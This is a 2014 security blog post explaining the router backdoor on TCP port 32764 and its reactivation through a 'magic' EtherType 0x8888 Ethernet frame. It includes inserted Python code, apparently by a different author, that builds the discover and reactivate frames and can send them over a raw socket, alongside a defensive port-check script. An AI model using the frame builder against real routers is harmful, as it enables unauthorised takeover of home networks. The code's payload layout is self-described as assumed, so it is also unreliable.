The Router You Own May Be Vulnerable: The Story of the "Fixed" Router Backdoor! - Hackatrick - Technology With Security

24 April 2014

The Router You Own May Be Vulnerable: The Story of the "Fixed" Router Backdoor!

It was Christmas 2013. French hacker Eloi Vanderbeken was enjoying the holidays and decided to tweak some performance settings on his router. The funny thing was that he had forgotten his own password, so hacking his way back in seemed more fun than a factory reset. *Clup*Clup*Boom*
Long story short, Vanderbeken found his way in.

He found a service listening on TCP port 32764 that could be instructed, without any authentication, to dump the router's configuration, including the admin username and password!

Luckily for you, that port was listening on the internal (LAN) side, not on the internet (WAN) side. That means the backdoor is only reachable by someone who is already on your network, i.e. on your subnet. It is still a giant security hole, though. For example: you say "Hey Hrishi, mind doing some performance upgrades on my laptop?" I sit down, I turn evil, I get into your router and mess with the settings, including opening up the backdoor on the internet-facing interface so I can get back in later. That's how dangerous it was!

So Vanderbeken reported it. Backdoor patched! WoooLaa! Not so fast. The backdoor existed to support the router's management software, the web interface many of you reach by typing the router's IP address into the address bar. When Vanderbeken looked at the patched firmware, the backdoor code was still there; it was merely turned off by default.

He dug further and found a way to re-enable the backdoor by sending the router a so-called "magic" Ethernet packet. Read about Ethernet II frames here.

The figure above shows the layout of an Ethernet II frame (taken from Wikipedia).

Quick theory: if you don't know what a MAC address is, google it. The FCS at the end of the frame is a CRC-32 used to detect transmission errors (it cannot recover the data, it only tells the receiver to drop the frame). The EtherType field says what the payload is:
EtherType 0x0800 is an IPv4 packet, 0x86DD an IPv6 packet, 0x0806 an ARP (Address Resolution Protocol) message, and 0x0842 a Wake-on-LAN magic packet.

Vanderbeken's router also listened for raw Ethernet frames with EtherType 0x8888, a vendor-specific value that has nothing to do with Wake-on-LAN. What he did was very simple, but it resulted in a boom: he sent the router a 0x8888 frame containing the command number
0x0201 and the MD5 hash of the string DGN1000, the model name the firmware checks for. This is a great example of thinking outside the box!

That little trick brought the dead backdoor back to life! He also discovered that broadcasting a 0x8888 frame with command number 0x0200 makes the router reply, which lets an attacker on the LAN locate every exploitable router.
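To make the frame layout and the two vendor commands concrete, here is an added Python example (my own code, not Vanderbeken's proof of concept and not anything from the router firmware). It builds and parses Ethernet II frames, produces a standard Wake-on-LAN magic packet for comparison, and produces the 0x8888 discover/reactivate payloads. The exact byte layout of that payload (a 2-byte big-endian command number followed by the 16-byte MD5 of the model string) is an assumption made for illustration, as are the MAC addresses and the "SomeOtherModel" name. The classifier at the end shows why a LAN monitor can only name a frame whose model hash it already knows.

```python
import hashlib
import struct

# EtherType values from the article, plus the vendor value the router listened on.
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
ETHERTYPE_WOL = 0x0842
ETHERTYPE_IPV6 = 0x86DD
ETHERTYPE_VENDOR = 0x8888

ETHERTYPE_NAMES = {
    ETHERTYPE_IPV4: "IPv4 (0x0800)",
    ETHERTYPE_ARP: "ARP (0x0806)",
    ETHERTYPE_WOL: "Wake-on-LAN (0x0842)",
    ETHERTYPE_IPV6: "IPv6 (0x86dd)",
}

# Command numbers quoted in the article. The payload layout used below
# (2-byte big-endian command, then the 16-byte MD5 of the model string)
# is an assumption for this example, not the documented wire format.
CMD_DISCOVER = 0x0200
CMD_REACTIVATE = 0x0201
BROADCAST = b"\xff" * 6
HEADER_LEN = 14


def mac_bytes(mac: str) -> bytes:
    """'02:00:00:00:00:01' -> 6 raw bytes."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC address: {mac}")
    return bytes(int(p, 16) for p in parts)


def build_frame(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    """Ethernet II: dst MAC, src MAC, 2-byte EtherType, payload.
    The FCS (CRC-32) is appended by the NIC, so it is not built here."""
    if len(dst) != 6 or len(src) != 6:
        raise ValueError("MAC addresses must be 6 bytes")
    return dst + src + struct.pack("!H", ethertype) + payload


def parse_frame(frame: bytes):
    """Split a frame into (dst, src, ethertype, payload)."""
    if len(frame) < HEADER_LEN:
        raise ValueError("truncated Ethernet header")
    (ethertype,) = struct.unpack("!H", frame[12:14])
    return frame[:6], frame[6:12], ethertype, frame[HEADER_LEN:]


def wol_magic_payload(target_mac: bytes) -> bytes:
    """The standard Wake-on-LAN magic packet: 6 x 0xFF then the MAC 16 times."""
    return b"\xff" * 6 + target_mac * 16


def vendor_payload(cmd: int, model: str) -> bytes:
    """Assumed 0x8888 payload: command number followed by MD5(model name)."""
    return struct.pack("!H", cmd) + hashlib.md5(model.encode()).digest()


def classify_frame(frame: bytes, known_models=("DGN1000",)) -> str:
    """Label a frame the way a LAN monitor would. A 0x8888 frame can only be
    tied to a model whose MD5 we precomputed; any other digest is reported as
    unknown, which is why a blocklist tuned to one model is not enough."""
    _, _, ethertype, payload = parse_frame(frame)
    if ethertype != ETHERTYPE_VENDOR:
        return ETHERTYPE_NAMES.get(ethertype, f"ethertype 0x{ethertype:04x}")
    if len(payload) < 18:
        return "vendor 0x8888: payload too short"
    (cmd,) = struct.unpack("!H", payload[:2])
    digest = payload[2:18]
    verb = {CMD_DISCOVER: "discover", CMD_REACTIVATE: "reactivate"}.get(cmd, f"cmd 0x{cmd:04x}")
    for model in known_models:
        if hashlib.md5(model.encode()).digest() == digest:
            return f"vendor 0x8888: {verb} for model {model}"
    return f"vendor 0x8888: {verb}, unknown model digest {digest.hex()}"


def send_frame(iface: str, frame: bytes) -> int:
    """Put a raw frame on the wire. Linux only, needs CAP_NET_RAW (root).
    Provided for completeness; nothing below calls it."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    src = mac_bytes("02:00:00:00:00:01")  # constructed attacker MAC
    samples = [
        ("discover", build_frame(BROADCAST, src, ETHERTYPE_VENDOR, vendor_payload(CMD_DISCOVER, "DGN1000"))),
        ("reactivate", build_frame(BROADCAST, src, ETHERTYPE_VENDOR, vendor_payload(CMD_REACTIVATE, "DGN1000"))),
        ("other model", build_frame(BROADCAST, src, ETHERTYPE_VENDOR, vendor_payload(CMD_REACTIVATE, "SomeOtherModel"))),
        ("wol", build_frame(BROADCAST, src, ETHERTYPE_WOL, wol_magic_payload(src))),
    ]
    for label, frame in samples:
        print(f"{label:12s} {len(frame):4d} bytes  {classify_frame(frame)}")
```

Note that the frame is addressed to the broadcast MAC, so every host on the segment sees it; only a router whose firmware recognises the digest will answer. Run the script as is to see the classifications; `send_frame` is only there to show that putting the frame on the wire is a one-liner once you have root on a LAN host.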

Now, how do you stay safe?

You know what, you can never be completely safe. Really. If you are thinking "I'll just sniff for EtherType 0x8888 frames and block the magic packet", think again. The frame arrives on the LAN side, where the router itself is the target, and the command numbers and the MD5 of the model string vary between models and firmware versions, so a filter tuned to one device tells you nothing about the next one. What you can do is check, from inside your LAN, whether TCP port 32764 on your gateway accepts connections, install the vendor's latest firmware, and treat a device that still answers on that port as untrusted.
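Here is the check I would actually run, as an added example (my own code, not from the article). It only tests whether something on the gateway accepts a TCP connection on port 32764; it does not speak the backdoor protocol. The gateway addresses in the demo are constructed guesses at common home-router addresses, and the throwaway local listener exists only so the positive path can be exercised without a vulnerable router.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

BACKDOOR_PORT = 32764


def port_open(host: str, port: int = BACKDOOR_PORT, timeout: float = 1.0) -> bool:
    """True if a TCP connect to host:port completes within timeout seconds.
    Refused, filtered and unreachable all come back as False."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_gateways(hosts, port: int = BACKDOOR_PORT, timeout: float = 1.0) -> dict:
    """Check several candidate gateway addresses in parallel; returns {host: bool}."""
    with ThreadPoolExecutor(max_workers=8) as pool:
        return dict(pool.map(lambda h: (h, port_open(h, port, timeout)), hosts))


def start_fake_listener(port: int = 0) -> int:
    """Bind a throwaway listener on 127.0.0.1 (port 0 = pick a free one) and
    return the port. It accepts and immediately drops connections in a daemon
    thread, standing in for a router that has the backdoor port open."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:
                return

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def find_closed_local_port() -> int:
    """Pick a port nothing is listening on, for a guaranteed negative result.
    Binding to port 0 reserves a free port; closing releases it unused."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # Constructed list of typical home-gateway addresses; adjust to your LAN.
    candidates = ["192.168.0.1", "192.168.1.1", "10.0.0.1"]
    for host, is_open in check_gateways(candidates).items():
        status = "port 32764 OPEN, investigate this device" if is_open else "closed"
        print(f"{host}: {status}")
```

A connection that succeeds does not prove the Sercomm service is behind it, only that something is listening where nothing should be; a closed port after a firmware update is the result you want, and it says nothing about the 0x8888 reactivation path, which is exactly the point made above.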

See whether your router supports an open-source firmware such as DD-WRT or OpenWrt. They are great! They are Linux based, and many kind developers around the world, from a sixteen-year-old to an old master, are always ready to lend a hand with patches.

So go on, tweak it, find something, and take your security measures. Don't worry, I won't drop in on you. ;)

Any suggestions or questions? Sure! Post them in the comments!